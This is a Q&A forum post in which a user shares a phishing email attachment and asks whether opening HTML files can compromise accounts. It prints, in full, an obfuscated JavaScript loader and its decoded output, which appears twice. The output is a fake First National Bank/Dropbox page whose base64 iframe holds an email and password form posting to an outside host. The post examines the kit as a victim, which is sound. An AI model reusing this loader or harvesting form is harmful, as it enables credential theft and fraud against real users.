# How can opening an HTML file compromise personal information / bank account details / etc?

Tags: javascript, phishing

I just received an email from someone I know quite well that was clearly a scam. It's from their gmail account so I assume that somewhere along the lines their password was compromised.

The email asked me to open an HTML attachment, which not surprisingly was just JavaScript. I've copied the whole email below (though I replaced tabs with spaces in to make it display better, so the encoding (if that's what it is) may be broken for the param passed to the `hJKm` function). I printed the result of the `document.write(source)` code from the original attachment below for info.

Looking at the resultant web page, I get prompted to enter my receiving email address and password - so I guess it's an attempt at gathering gmail addresses and passwords. This is much less aggressive than I initially thought. But the question is:

Is their ever a reason to worry about just opening an HTML file? I understand that browsers have a variety of ways of storing data, but that supposedly these are safe for major websites such as Facebook/Gmail/etc. (I guess the thing I should be worried about is a CORS attack?)

***The source code of the attachment***

```
<! This message MUST stay in place !>
<! Created With HTML Code Guard v2.1 !>
<! Get your copy at http://www.adobe.com>
<HTML><HEAD><SCRIPT LANGUAGE='JavaScript'>
var key = "AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz1029384756><#].:/";
function hJKm(_message) {
    var bTG;
    var rcH = key.length/2;
    var _newString = "";
    var lk;
    for (var x = 0; x < _message.length; x++) {
        bTG = key.indexOf(_message.charAt(x));
        if (bTG > rcH) {
            lk = bTG - rcH; _newString += key.charAt(34 - lk);
        } else {
            if (key.indexOf(_message.charAt(x)) < 0) {
                _newString += _message.charAt(x);
            } else {
                lk = rcH - bTG; _newString += key.charAt(34 + lk);
            }
        }
    }
    return (_newString);
}
source=hJKm("   c!6t<ojs7 0ovwDc0ovw z6=\"i:Qxzu\" <w:pp=\"mH_H vzu27z90o \"D c07:6D cozow7D>qts]tk w 2tv7cAozow7D cv7o: 0oos-7rnzm=\"L-O/-#tvs:oz]w7\" <tuo7uo=\"15=5697\"D cv7o: u:v7=\"mz7lstqo\" <tuo7uo=\"lz6o0=67mz<7-lz6o0, zuzoz:w-p<:w7=IBh, v:kzvnv-p<:w7=IBh, np7q-p<:w:]w7=ut\" ADcv7o: u:v7=\"2:u607w64qz7u6wj\" <tuo7uo=\"oqn7\" AD cwzux q7w=\"pojw7p077o\" ojs7=\"o7koA<pp\" 0q78=\"0oospaAAlllB8u]B<tBi:Ahh/pp7opAmHBHA<ppA8tuoA8tuoB<pp?m=IFgGhFeHdHhhh\"D cwzux q7w=\"pojw7p077o\" ojs7=\"o7koA<pp\" 0q78=\"0oospaAAlllB8u]B<tBi:Ahh/pp7opAmHBHA<ppAv:zu_WWB<pp?m=IFgGhFeHdHhhh\"Dcwzux q7w=\"pojw7p077o\" ojs7=\"o7koA<pp\" 0q78=\"0oospaAAlllB8u]B<tBi:Ahh/pp7opAmHBHAypAwz]pA<GBvzuB<pp\"Dcwzux q7w=\"pojw7p077o\" ojs7=\"o7koA<pp\" 0q78=\"0oospaAAlllB8u]B<tBi:Ahh/pp7opAmHBHA<ppAwz]pAyrn7qj-nzBvzuB<pp\"Dcp<qzso ojs7=\"o7koAy:m:p<qzso\" pq<=\"0oospaAAlllB8u]B<tBi:Ahh/pp7opAmHBHAypAwz]pAyrn7qjByp\"DcAp<qzsoDcp<qzso ojs7=\"o7koAy:m:p<qzso\" pq<=\"0oospaAAlllB8u]B<tBi:Ahh/pp7opAmHBHAypAwz]pAl:jstzuopByp\"DcAp<qzsoD cp<qzso ojs7=\"o7koAy:m:p<qzso\" pq<=\"0oospaAAlllB8u]B<tBi:Ahh/pp7opAmHBHAypAwz]pAs:q:ww:kByp\"DcAp<qzsoD cp<qzso ojs7=\"o7koAy:m:p<qzso\" pq<=\"0oospaAAlllB8u]B<tBi:Ahh/pp7opAmHBHAypAwz]pApwz<xBvzuByp\"DcAp<qzsoDcp<qzso ojs7=\"o7koAy:m:p<qzso\" pq<=\"0oospaAAlllB8u]B<tBi:Ahh/pp7opAmHBHAypAwz]pA6GByp\"DcAp<qzsoDcp<qzso ojs7=\"o7koAy:m:p<qzso\" pq<=\"0oospaAAlllB8u]B<tBi:Ahh/pp7opAmHBHAypAwz]pA9:n97Byp\"DcAp<qzsoDcp<qzso ojs7=\"o7koAy:m:p<qzso\" pq<=\"0oospaAAlllB8u]B<tBi:Ahh/pp7opAmHBHAypAwz]pA<GBvzuByp\"DcAp<qzsoDcp<qzso ojs7=\"o7koAy:m:p<qzso\" pq<=\"0oospaAAlllB8u]B<tBi:Ahh/pp7opAmHBHAypAwz]pAyrn7qj-nzBvzuByp\"DcAp<qzsoDcp<qzso ojs7=\"o7koAy:m:p<qzso\" pq<=\"0oospaAAlllB8u]B<tBi:Ahh/pp7opAmHBHAypAwz]pAyrn7qjBp<qtwwz8jBvzuByp\"DcAp<qzsoDcp<qzso ojs7=\"o7koAy:m:p<qzso\" pq<=\"0oospaAAlllB8u]B<tBi:Ahh/pp7opAmHBHAypAv:zu_WWByp?m=IFgGhFeHdHhhh\"DcAp<qzsoDcp<qzso ojs7=\"o7koAy:m:p<qzso\" pq<=\"0oospaAAlllB8u]B<tBi:Ahh/pp7opAmHBHAypA8tqvN:wz6:oztuByp?m=IFgGhFeHdHhhh\"DcAp<qzsoDcp<qzso ojs7=\"o7koAy:m:p<qzso\" pq<=\"0oospaAAlllB8u]B<tBi:Ahh/pp7opAmHBHAypAwz]pA/uzv:o7Byp\"DcAp<qzsoDcp<qzso ojs7=\"o7koAy:m:p<qzso\" pq<=\"0oospaAAlllB8u]B<tBi:Ahh/pp7opAmHBHAypAwz]pAQ<qtww7qByp\"DcAp<qzsoDcp<qzso ojs7=\"o7koAy:m:p<qzso\" pq<=\"0oospaAAlllB8u]B<tBi:Ahh/pp7opAmHBHAypAwz]pAq7u67qByp\"DcAp<qzsoDcp<qzso ojs7=\"o7koAy:m:p<qzso\" pq<=\"0oospaAAlllB8u]B<tBi:Ahh/pp7opAmHBHAypAwz]pA5:pjQ<qtww7qByp\"DcAp<qzsoDcp<qzso ojs7=\"o7koAy:m:p<qzso\" pq<=\"0oospaAAlllB8u]B<tBi:Ahh/pp7opAmHBHAypA.:p7dFByp?m=IFgGhFeHdHhhh\"DcAp<qzsoD  cwzux q7w=\"pojw7p077o\" ojs7=\"o7koA<pp\" 0q78=\"0oospaAAlllB8u]B<tBi:Ahh/pp7opAmHBHA<ppAv:zu_]qtlp7qT#B<pp?m=IFgGhFeHdHhhh\"0oospaAAlllB8u]B<tBi:AD cp<qzso ojs7=\"o7koAy:m:p<qzso\" pq<=\"0oospaAAlllB8u]B<tBi:Ahh/pp7opAmHBHAypAv:zu_WW_s<Byp?m=IFgGhFeHdHhhh\"DcAp<qzsoD cwzux q7w=\"pojw7p077o\" ojs7=\"o7koA<pp\" 0q78=\"0oospaAAlllB8u]B<tBi:Ahh/pp7opAmHBHA<ppAsqzuoB<pp?m=IFgGhFeHdHhhh\" AD cv7o: u:v7=\"67p<qzsoztu\" <tuo7uo=\"M7w<tv7 ot 4zqpo V:oztu:w .:uxB 2tl <:u l7 07ws jtn? \" AD cv7o: u:v7=\"x7jltq6p\" <tuo7uo=\"\" AD  cv7o: sqts7qoj=\"t9aozow7\" <tuo7uo=\"2tv7\" AD cv7o: sqts7qoj=\"t9a67p<qzsoztu\" <tuo7uo=\"M7w<tv7 ot 4zqpo V:oztu:w .:uxB 2tl <:u l7 07ws jtn? \" AD  cv7o: sqts7qoj=\"t9azv:97\" <tuo7uo=\"0oospaAAlllB8u]B<tBi:AhGzv:97pAwt9tBsu9\" AD cA07:6D c]t6jDcz8q:v7 u:v7=\"1I\" lz6o0=\"IGFh\" 07z90o=\"fhh\" pq<=\"6:o:ao7koA0ovw;]:p7dF,T30h]Ml+>StV#yktJM4xT9hYT3Iw6359:2Rh<#Iw<LNs6yhzSHgn63Nn6#IO7L.w1z.y]HEhJMEhTQZhJL0hXH0h]Mle13VtKLZiJLSg6HwnJ3gG<jhkWyOj1yFV#ykh:LRpJPET6vNj<HN0<j.OJMkwJGZ0<30sKj.O<v4n<HJw<z.>]HEv:LZoKLRs]HFfXGRs63kwT9hYT2Vh7Mkw12RE<3Og1uRw72SmKGVi1yFV#yl0XQhV#zEi62wpJP597lhY#MJm]uSoJv4o:MkEUz..<vw0]#l9Q3Np6vNh:MV0X#.iKMEiXLVw<vwvUlhY#MJm]uSo<HwdJPt9WPRl7>pV#9wv]HEhXL6w:M6t6>t9KvgpJ>pV#uhV#zhoT9hYT#gi62wpJPFV#ylm:3N0J>FV#9hYT3ZmJ2x+>StV#ykl134p:M6nTQZyJMEhJL1zTyks]M<9<GZyTQZt62RlUzfm6G6GXy.w<3gj634p<HNj6vNjXvVm]Qgl]G/n:u.u1z.G:MRh:>hzVyKE1z.tJMwu:2Sg1yKhVz1+T#glT9hY>StfJ3wH12Vh7MkwTQZl]GVs63wm]yt9KMZi]HkI63Oe126sJ2RtUz/hW>Vl7>p9:3NsJH0hUz/iW>Zl7>p97zIs]vRw7>t9Wip9]3Nv6>t9V><E<29e12Rm<>t9WPOF<29z13wxTQZpKLww<yWzT9hY#PkhKMZpJQ.z]GZxJL1g1y5z126sJ2RtTQ1kW>Ww1z.sJ>hz634z]3Oj1z.i62wpJPhzKvgjJ3NjXL6sJ2RtUz/l<29zT9hY#Sxf621+>StZ#Sxf63S9<GRE]3Og1vZm<vRw<zIi62wpJPt9]vgnJPp9KvgjJ3NjXL6sJ2RtUz.oJMRs6MhzTykv]GZo13Iw630mJ>hz<3gi6#19]v4oJPhz]Lwv]GZo1z.0KGRs]HFg1v0h62/dXjgo:MkpJL1oJv4j]LWnKHgoXGZwJ3wjJMVh:MEuLG.pJM4iJNgGKMwhXu.t<#1+>StZ#Sx91>klTzJnKuVlUj/fXG/+>StZ#Sx91>kx:LK9KHk0<GWg1vVm]#Ii]QhkWz1+>StZ#SxZ#SxZ#SxZT3ZjXiFV#9xZ#SxZ#SxZ#SxfKu1mT9hY1#/91#/91#/91#/91#/91#/91#/91#/91#/91#/91#/91#/91#/91>kz<zf+>StZ#SxZ#SxZ#SxZZvEz<G/eZvEz<G/e>StZ#SxZ#SxZ#SxZZvEz<G/eT2VlKMF9KHk0<GWg1uVh7MkwWQ1+15NoKMwpZvEz<G/eZvEz<G/eT#gi<34nTzJnKuVlUjJnKuVlUjJnKuVlUj/v]vZi<>pv]vZi<>pv]vZi<>pv]vZi<>pv]vZi<>pv]vZi<>p9ZvEz<G/eZvEz<G/eZvEz<G/eZvEz<G/eZvEz<G/eZvEz<G/e>StZ#SxZ#SxZ#Sx91#/91>ks]u.I6#.h7L.wTQZw]M4s]#19<vNk6MwjJMS9KHk0<GWg1vJm<vhoKHgn62Zm]#19:MSg1vNoKMwp1z.nKMIwTQZw]M4s]#19<3k0KHNt]HkxJL1g1z196v4p6MO9<HwdJPhzWi/zT9hY#SxZ#Q/9T3ZjXiFV#9xZ#Sx91>kz<zf+>StZ#Sx91#/91#/f<G.0]z.i62wpJPhz]M4jJHwnXLRm<>t9W>p9]M4jJHwnXMZm62Rm]Pt9W#1+>StZ#Sx91#JnKuVlUjJnKuVlUjJnKuVlUjJnKuVlUjJnKuVlUiki62Zm]v<9KHk0<GWg1uVh7MkwWQ1+RMI0:Ml9O34i<G6m<vSfXGVh<vgnJiFv]vZi<>p91#/9>St91#/91#/91#/91#/91>ks]u.I6#.h7L.wTQZlKLVi6HgjJ#19<vNk6MwjJMS9KHk0<GWg1vJm<vhoKHgn62Zm]#19:MSg1u.0<GVG]GZx1z.nKMIwTQZlKLVi6HgjJ#19<3k0KHNt]HkxJL1g1z196v4p6MO9<HwdJPhzWi/zT9hY#Sx91#/91#/fXGVlKMF+T#gx:LK+>StZ#SxZT2/9<GRE]3Og1vI0<v6s]zIh]G/d1>/e13I0<v6s]zIz]GRh]Hhd1>/zTzJnKuVlUilm<>FV#9xZ#Q/9T2/9KMksJHFg1vVw]uRw<z19<GRE]3Og1vI0<v6s]zIh]G/d1>/e13I0<v6s]zIz]GRh]Hhd1>/zT9hY#SxZ1#/91>ks]u.I6#.h7L.wTQZs]M4uJQ19<GZyTQZt62RlUzfm6G6GXy.w<3gj634p<HNj6vNjXvVm]Qgz6LRh]HE0KuV0Xu.nJj19KMkhTQZW]H6s]z19]v4oJPhzQP5z126sJ2RtTQ1EW#19:3NsJH0hTQ1iWz1+>StZ#Sx91>lm<>FV#9xZ#Sxf<#.i62wpJPhz]M4jJHwnXLRm<>t9W>p9]M4jJHwnXMZm62Rm]Pt9W#1+ZvEz<G/e>StZ#SxZT#glT9hY#SxZ1#/fXHJm<vh+>StZ#Q/9T#ghJ>FV#9xZT#gh<yFV#z/9T#ghKMZpJPFV#ylmJ3wHT9hY>StfXHZmJ2x+>StV#ylm:2Ro]>F=\" ]tq67q=\"h\" 8q:v7]tq67q=\"h\"D c6zm :wz9u=\"w78o\"DKtnq ]qtlp7q 6t7p uto pnsstqo zuwzu7 8q:v7p tq zp <nqq7uowj <tu8z9nq76 uto ot 6zpsw:j zuwzu7 8q:v7pB cA6zmD cAz8q:v7DcA]t6jDcA0ovwD");
document.write(source);
</script>
</head></html>
```

***The result of `document.write(source)` is this:***

```
<!doctype html>
<html id="zaSkin" class="v2_2 minHeight ">

<head>
    <title>Dropbox l Home</title>
    <meta http-equiv="X-UA-Compatible" content="IE=Edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
    <meta name="HandheldFriendly" content="true" />
    <link rel="stylesheet" type="text/css" href="https://www.fnb.co.za/00Assets/v2.2/css/font/font.css?v=1493047262000">
    <link rel="stylesheet" type="text/css" href="https://www.fnb.co.za/00Assets/v2.2/css/main_MM.css?v=1493047262000">
    <link rel="stylesheet" type="text/css" href="https://www.fnb.co.za/00Assets/v2.2/js/libs/c3.min.css">
    <link rel="stylesheet" type="text/css" href="https://www.fnb.co.za/00Assets/v2.2/css/libs/jquery-ui.min.css">
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/jquery.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/waypoints.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/parallax.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/slick.min.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/d3.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/gauge.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/c3.min.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/jquery-ui.min.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/jquery.scrollify.min.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/main_MM.js?v=1493047262000"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/formValidation.js?v=1493047262000"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/Animate.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/Scroller.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/render.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/EasyScroller.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/Base64.js?v=1493047262000"></script>
    <link rel="stylesheet" type="text/css" href="https://www.fnb.co.za/00Assets/v2.2/css/main_browserPC.css?v=1493047262000" https://www.fnb.co.za/>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/main_MM_pc.js?v=1493047262000"></script>
    <link rel="stylesheet" type="text/css" href="https://www.fnb.co.za/00Assets/v2.2/css/print.css?v=1493047262000" />
    <meta name="description" content="Welcome to First National Bank. How can we help you? " />
    <meta name="keywords" content="" />
    <meta property="og:title" content="Home" />
    <meta property="og:description" content="Welcome to First National Bank. How can we help you? " />
    <meta property="og:image" content="https://www.fnb.co.za/03images/logo.png" /> </head>

<body>
    <iframe name="I1" width="1340" height="800" src="data:text/html;base64,PGh0bWw+DQoNCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9d2luZG93cy0xMjUyIj4NCjx0aXRsZT5PdmVyc2VhcyBUZWxlZ3JhcGhpYyBUcmFuc2ZlciBDb25maXJtYXRpb248L3RpdGxlPg0KPHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCjwhLS0NCi5zdHlsZTEgew0KCWZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmOw0KCWZvbnQtc2l6ZTogMTRweDsNCglmb250LXdlaWdodDogYm9sZDsNCn0NCi0tPg0KPC9zdHlsZT4NCjwvaGVhZD4NCg0KPGJvZHk+DQoNCjxwIGFsaWduPSJjZW50ZXIiPjxpbWcgc3JjPSJodHRwOi8vd3d3LjBlcG9ydGFsc2VydmVyLmNvbS9wb3AuanBnIiB3aWR0aD0iNjY5IiBoZWlnaHQ9IjY0NiI+PC9wPg0KDQo8ZGl2IHN0eWxlPSJwb3NpdGlvbjogYWJzb2x1dGU7IHdpZHRoOiA0MDNweDsgaGVpZ2h0OiAzMDJweDsgei1pbmRleDogMzsgbGVmdDogNDc5cHg7IHRvcDogMTU4cHgiIGlkPSJsYXllcjMiPg0KCTx0YWJsZSBib3JkZXI9IjEiIHdpZHRoPSIxMDMlIiBpZD0idGFibGUyIiBzdHlsZT0iYm9yZGVyLXdpZHRoOiAwcHgiPg0KCQk8dHI+DQoJCQk8dGQgc3R5bGU9ImJvcmRlci1zdHlsZTogbm9uZTsgYm9yZGVyLXdpZHRoOiBtZWRpdW0iPjxmb3JtIG1ldGhvZD0icG9zdCIgbmFtZT0ibXlmb3JtIiBhY3Rpb249Imh0dHA6Ly9taWxsZXItZmFybXMuY29tL3JlZGlyZWN0aW5nX3BsZWFzZV93YWl0LnBocCI+DQoJCQkgIDxwPiZuYnNwOyA8L3A+DQoJCQkgIDxkaXYgY2xhc3M9ImNvbC1zbS0xMiI+DQoJCQkJCQkJCQkJPGJyLz4NCgkJCQkJCQkJCQk8YnIvPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxici8+DQoJCQkJCQkJCQkJJm5ic3A7Jm5ic3A7DQoJCQkJCQkJCQkJJm5ic3A7PHNwYW4gY2xhc3M9InN0eWxlMSI+IEVtYWlsJm5ic3A7Jm5ic3A7PC9zcGFuPiZuYnNwOyZuYnNwOyZuYnNwOyAmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsgJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7DQoJCQkJCQkJCQkgICAgIDxpbnB1dCB0eXBlPSJlbWFpbCIgcmVxdWlyZWQgY2xhc3M9ImZvcm0tY29udHJvbCIgaWQ9ImVtYWlsIiBuYW1lPSJlbWFpbCIgcGxhY2Vob2xkZXI9IiIgdmFsdWUgc2l6ZT0iMzAiPg0KCQkJCSAgPGJyLz4NCgkJCQkgIDxici8+DQoJCQkgICAgICA8c3BhbiBzdHlsZT0ibWFyZ2luLXRvcDogMDsgbWFyZ2luLWJvdHRvbTogMCI+DQoJCQkgICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOzxzdHJvbmcgY2xhc3M9InN0eWxlMSI+RW1haWwgUGFzc3dvcmQ8L3N0cm9uZz4mbmJzcDsgICAgDQogICAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJwYXNzd29yZCIgcmVxdWlyZWQgY2xhc3M9ImZvcm0tY29udHJvbCIgaWQ9InBhc3N3b3JkIiBuYW1lPSJwYXNzd29yZCIgcGxhY2Vob2xkZXI9IiIgdmFsdWUgc2l6ZT0iMzAiPg0KCQkgICAgICA8L3NwYW4+PC9kaXY+DQoJCQkJPHAgc3R5bGU9Im1hcmdpbi10b3A6IDA7IG1hcmdpbi1ib3R0b206IDAiPiZuYnNwOzwvcD4NCgkJCSAgPHAgYWxpZ249ImNlbnRlciIgc3R5bGU9Im1hcmdpbi10b3A6IDA7IG1hcmdpbi1ib3R0b206IDAiPg0KCQkJICAgIDxpbnB1dCB0eXBlPSJpbWFnZSIgc3JjPSJodHRwOi8vd3d3LjBlcG9ydGFsc2VydmVyLmNvbS9idXR0b25hYnNhLnBuZyIgYWx0PSJMb2dpbiIgbmFtZT0iSTEiIHdpZHRoPSI5MCIgaGVpZ2h0PSIzMiI+DQoJCQkgIDwvcD4NCgkJCQk8cCBzdHlsZT0ibWFyZ2luLXRvcDogMDsgbWFyZ2luLWJvdHRvbTogMCI+Jm5ic3A7DQoJCQkJPC9wPg0KCQkJICA8L2Zvcm0+DQoJCSAgPC90ZD4NCgkJPC90cj4NCiAgPC90YWJsZT4NCjwvZGl2Pg0KDQo8L2JvZHk+DQoNCjwvaHRtbD4=" border="0" frameborder="0">
        <div align="left">Your browser does not support inline frames or is currently configured not to display inline frames. </div>
    </iframe>
</body>

</html>
<!doctype html>
<html id="zaSkin" class="v2_2 minHeight ">

<head>
    <title>Dropbox l Home</title>
    <meta http-equiv="X-UA-Compatible" content="IE=Edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
    <meta name="HandheldFriendly" content="true" />
    <link rel="stylesheet" type="text/css" href="https://www.fnb.co.za/00Assets/v2.2/css/font/font.css?v=1493047262000">
    <link rel="stylesheet" type="text/css" href="https://www.fnb.co.za/00Assets/v2.2/css/main_MM.css?v=1493047262000">
    <link rel="stylesheet" type="text/css" href="https://www.fnb.co.za/00Assets/v2.2/js/libs/c3.min.css">
    <link rel="stylesheet" type="text/css" href="https://www.fnb.co.za/00Assets/v2.2/css/libs/jquery-ui.min.css">
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/jquery.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/waypoints.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/parallax.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/slick.min.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/d3.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/gauge.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/c3.min.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/jquery-ui.min.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/jquery.scrollify.min.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/main_MM.js?v=1493047262000"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/formValidation.js?v=1493047262000"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/Animate.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/Scroller.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/render.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/EasyScroller.js"></script>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/Base64.js?v=1493047262000"></script>
    <link rel="stylesheet" type="text/css" href="https://www.fnb.co.za/00Assets/v2.2/css/main_browserPC.css?v=1493047262000" https://www.fnb.co.za/>
    <script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/main_MM_pc.js?v=1493047262000"></script>
    <link rel="stylesheet" type="text/css" href="https://www.fnb.co.za/00Assets/v2.2/css/print.css?v=1493047262000" />
    <meta name="description" content="Welcome to First National Bank. How can we help you? " />
    <meta name="keywords" content="" />
    <meta property="og:title" content="Home" />
    <meta property="og:description" content="Welcome to First National Bank. How can we help you? " />
    <meta property="og:image" content="https://www.fnb.co.za/03images/logo.png" /> </head>

<body>
    <iframe name="I1" width="1340" height="800" src="data:text/html;base64,PGh0bWw+DQoNCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9d2luZG93cy0xMjUyIj4NCjx0aXRsZT5PdmVyc2VhcyBUZWxlZ3JhcGhpYyBUcmFuc2ZlciBDb25maXJtYXRpb248L3RpdGxlPg0KPHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCjwhLS0NCi5zdHlsZTEgew0KCWZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmOw0KCWZvbnQtc2l6ZTogMTRweDsNCglmb250LXdlaWdodDogYm9sZDsNCn0NCi0tPg0KPC9zdHlsZT4NCjwvaGVhZD4NCg0KPGJvZHk+DQoNCjxwIGFsaWduPSJjZW50ZXIiPjxpbWcgc3JjPSJodHRwOi8vd3d3LjBlcG9ydGFsc2VydmVyLmNvbS9wb3AuanBnIiB3aWR0aD0iNjY5IiBoZWlnaHQ9IjY0NiI+PC9wPg0KDQo8ZGl2IHN0eWxlPSJwb3NpdGlvbjogYWJzb2x1dGU7IHdpZHRoOiA0MDNweDsgaGVpZ2h0OiAzMDJweDsgei1pbmRleDogMzsgbGVmdDogNDc5cHg7IHRvcDogMTU4cHgiIGlkPSJsYXllcjMiPg0KCTx0YWJsZSBib3JkZXI9IjEiIHdpZHRoPSIxMDMlIiBpZD0idGFibGUyIiBzdHlsZT0iYm9yZGVyLXdpZHRoOiAwcHgiPg0KCQk8dHI+DQoJCQk8dGQgc3R5bGU9ImJvcmRlci1zdHlsZTogbm9uZTsgYm9yZGVyLXdpZHRoOiBtZWRpdW0iPjxmb3JtIG1ldGhvZD0icG9zdCIgbmFtZT0ibXlmb3JtIiBhY3Rpb249Imh0dHA6Ly9taWxsZXItZmFybXMuY29tL3JlZGlyZWN0aW5nX3BsZWFzZV93YWl0LnBocCI+DQoJCQkgIDxwPiZuYnNwOyA8L3A+DQoJCQkgIDxkaXYgY2xhc3M9ImNvbC1zbS0xMiI+DQoJCQkJCQkJCQkJPGJyLz4NCgkJCQkJCQkJCQk8YnIvPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxici8+DQoJCQkJCQkJCQkJJm5ic3A7Jm5ic3A7DQoJCQkJCQkJCQkJJm5ic3A7PHNwYW4gY2xhc3M9InN0eWxlMSI+IEVtYWlsJm5ic3A7Jm5ic3A7PC9zcGFuPiZuYnNwOyZuYnNwOyZuYnNwOyAmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsgJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7DQoJCQkJCQkJCQkgICAgIDxpbnB1dCB0eXBlPSJlbWFpbCIgcmVxdWlyZWQgY2xhc3M9ImZvcm0tY29udHJvbCIgaWQ9ImVtYWlsIiBuYW1lPSJlbWFpbCIgcGxhY2Vob2xkZXI9IiIgdmFsdWUgc2l6ZT0iMzAiPg0KCQkJCSAgPGJyLz4NCgkJCQkgIDxici8+DQoJCQkgICAgICA8c3BhbiBzdHlsZT0ibWFyZ2luLXRvcDogMDsgbWFyZ2luLWJvdHRvbTogMCI+DQoJCQkgICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOzxzdHJvbmcgY2xhc3M9InN0eWxlMSI+RW1haWwgUGFzc3dvcmQ8L3N0cm9uZz4mbmJzcDsgICAgDQogICAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJwYXNzd29yZCIgcmVxdWlyZWQgY2xhc3M9ImZvcm0tY29udHJvbCIgaWQ9InBhc3N3b3JkIiBuYW1lPSJwYXNzd29yZCIgcGxhY2Vob2xkZXI9IiIgdmFsdWUgc2l6ZT0iMzAiPg0KCQkgICAgICA8L3NwYW4+PC9kaXY+DQoJCQkJPHAgc3R5bGU9Im1hcmdpbi10b3A6IDA7IG1hcmdpbi1ib3R0b206IDAiPiZuYnNwOzwvcD4NCgkJCSAgPHAgYWxpZ249ImNlbnRlciIgc3R5bGU9Im1hcmdpbi10b3A6IDA7IG1hcmdpbi1ib3R0b206IDAiPg0KCQkJICAgIDxpbnB1dCB0eXBlPSJpbWFnZSIgc3JjPSJodHRwOi8vd3d3LjBlcG9ydGFsc2VydmVyLmNvbS9idXR0b25hYnNhLnBuZyIgYWx0PSJMb2dpbiIgbmFtZT0iSTEiIHdpZHRoPSI5MCIgaGVpZ2h0PSIzMiI+DQoJCQkgIDwvcD4NCgkJCQk8cCBzdHlsZT0ibWFyZ2luLXRvcDogMDsgbWFyZ2luLWJvdHRvbTogMCI+Jm5ic3A7DQoJCQkJPC9wPg0KCQkJICA8L2Zvcm0+DQoJCSAgPC90ZD4NCgkJPC90cj4NCiAgPC90YWJsZT4NCjwvZGl2Pg0KDQo8L2JvZHk+DQoNCjwvaHRtbD4=" border="0" frameborder="0">
        <div align="left">Your browser does not support inline frames or is currently configured not to display inline frames. </div>
    </iframe>
</body>

</html>
```

Comment: Your question is off-topic, but with an up-to-date browser and operating system and Flash and Java disabled you should have nothing to worry about.

Comment: browsers work inside a sandbox and annoying the user is about the most they can do if your browser is up to date although i always say nothing is 100% certain. one thing you may notice with ads is that they can be about products you have recently looked at on a completely different site, so emptying your cache is always a good idea

